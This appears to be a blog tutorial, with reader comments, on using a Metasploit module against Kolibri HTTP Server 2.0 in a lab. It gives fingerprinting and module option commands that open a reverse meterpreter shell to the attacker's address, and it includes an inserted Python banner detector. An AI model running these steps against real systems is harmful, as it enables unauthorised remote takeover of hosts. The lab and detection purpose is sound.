Type : Tutorial
Level : Easy
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP3
Tested Vulnerable Application : Kolibri 2.0
Exploit Credit : mr_me, The_Leader
Another zero-day exploit has been found in Kolibri HTTP Web Server. The exploit was actually added to the Metasploit Framework as a module on 2011-08-03, but until now there has been no fix or update from the Kolibri developer.
1. Metasploit Framework
2. Kolibri HTTP Server 2.0 (download below)
3. Kolibri HTTP exploit (download link)
Attacker IP address : 192.168.8.93
Victim IP address : 192.168.8.94
1. Download the kolibri_http.rb exploit from the link above. For testing purposes I've also included a link to download the vulnerable Kolibri web server 2.0 so you can try it in your own lab.
Copy kolibri_http.rb to the following folder (I'm using Backtrack 5 R1):
/pentest/exploit/framework/modules/exploit/windows/http
2. To determine which type of server is running, we can do a simple fingerprint by telnetting to the remote host on the specified port. In this case the victim's Kolibri HTTP server runs on port 8080, whereas a web server usually runs on port 80.
telnet 192.168.8.94 8080
       ^            ^
       |            port
       remote IP address
3. Next, prepare the exploit for the vulnerable Kolibri web server by selecting the module we added in step 1. In this exploit I'm using the meterpreter payload.
4. Set the options needed to run the exploit. To view all the available options for this exploit + payload, just run the show options command.
Information :
set rhost 192.168.8.94 --> determine the target ip address
set rport 8080 --> determine the target port which run kolibri web server
set lhost 192.168.8.93 --> our local ip address to receive reverse connection from victim
set lport 443 --> local port to handle reverse connection from victim
5. When everything has been set up correctly, run the exploit with the exploit command and see whether it is successful or not.
pWn3D!!
1. As I write this tutorial (2011-10-21), Kolibri web server still has no update, a.k.a. the exploit status is still zero-day.
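Since no fixed release exists, the practical countermeasure is to find Kolibri instances on your own network and take them off shared segments. The following added example (not part of the original tutorial or of the Metasploit module) applies the banner check from step 2 to classify HTTP responses; the `Server` header pattern, the function names and the sample responses are assumptions or constructed, so compare the pattern with the banner your own telnet session shows.

```python
import re
import socket

# Assumption: Kolibri names itself in the HTTP "Server" header. The tutorial does
# not show the exact banner, so the product name and version are matched loosely.
KOLIBRI_RE = re.compile(r"kolibri[-/ _]?v?(\d+(?:\.\d+)*)?", re.IGNORECASE)

def parse_server_header(raw: bytes):
    """Return the Server header value of a raw HTTP response, or None."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.splitlines()
    if not lines or not lines[0].startswith("HTTP/"):
        return None  # empty reply or a non-HTTP service on that port
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":  # header names are case-insensitive
            return value.strip()
    return None

def classify(raw: bytes):
    """Map a captured banner to a (status, version) pair."""
    server = parse_server_header(raw)
    if server is None:
        return ("no-server-header", None)
    match = KOLIBRI_RE.search(server)
    if not match:
        return ("other", None)
    version = match.group(1)
    # 2.0 is the version the tutorial tested; other versions are still reported.
    return ("kolibri-tested-version" if version == "2.0" else "kolibri", version)

def grab_banner(host: str, port: int, timeout: float = 3.0) -> bytes:
    """Scripted form of the telnet check: send a HEAD request, read the first bytes back."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
        return sock.recv(4096)

# Constructed sample responses (not captured from real servers).
SAMPLES = {
    "dev-box:8080": b"HTTP/1.1 200 OK\r\nServer: kolibri-2.0\r\nContent-Type: text/html\r\n\r\n",
    "intranet:80": b"HTTP/1.1 200 OK\r\nDate: Fri, 21 Oct 2011 08:00:00 GMT\r\nserver: Apache\r\n\r\n",
    "ssh:22": b"SSH-2.0-OpenSSH_5.3\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, classify(raw))
```

To check a live host in your own lab, pass the result of `grab_banner("192.168.8.94", 8080)` to `classify`.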
Hope it's useful
Vishnu,
Instead of copying your exploit into:
/pentest/exploit/framework/modules/exploit/windows/http
You should copy it into:
~/.msf4/modules/exploits/windows/http
#Matt
Hmm…but that’s what I’m doing…usually the .msf4 folder was for fileformat exploit generated file.
Hi bro, I tested it on Windows 7 but it won't work. I ran the server on Windows 7 and found it not working. Should I use an XP box, and will it be only XP Service Pack 3, or can I try any XP box? Please reply soon.
#jeetjain
I haven’t tried it on Windows 7; if you have tried it, maybe it won’t work..
It does not work in Windows 7. It only will work in xp sp3 or windows 2003 sp2, per http://www.metasploit.com/modules/exploit/windows/http/kolibri_http
Windows 7 has DEP and ASLR which helps prevent exploitation. There's more work to be done on the metasploit module to get it past those, if it's possible.
#Matt
Thanks for explanation
Thanks Matt Andreko bro
Hi,
As author of Kolibri WebServer let me clarify that Kolibri WS is not intended for any production use or any use on publicly available address. It is only development server for easy testing of PHP/web applications locally, it does not scale, it is not secure as it is not intended to be secure or scalable.
#Fedja S
Sure, I’ll deliver your message.. but btw, even if it was not for any public production use, what if I run your webserver for development/easy testing on a Local Area Network inside my campus that has more than a thousand users inside it?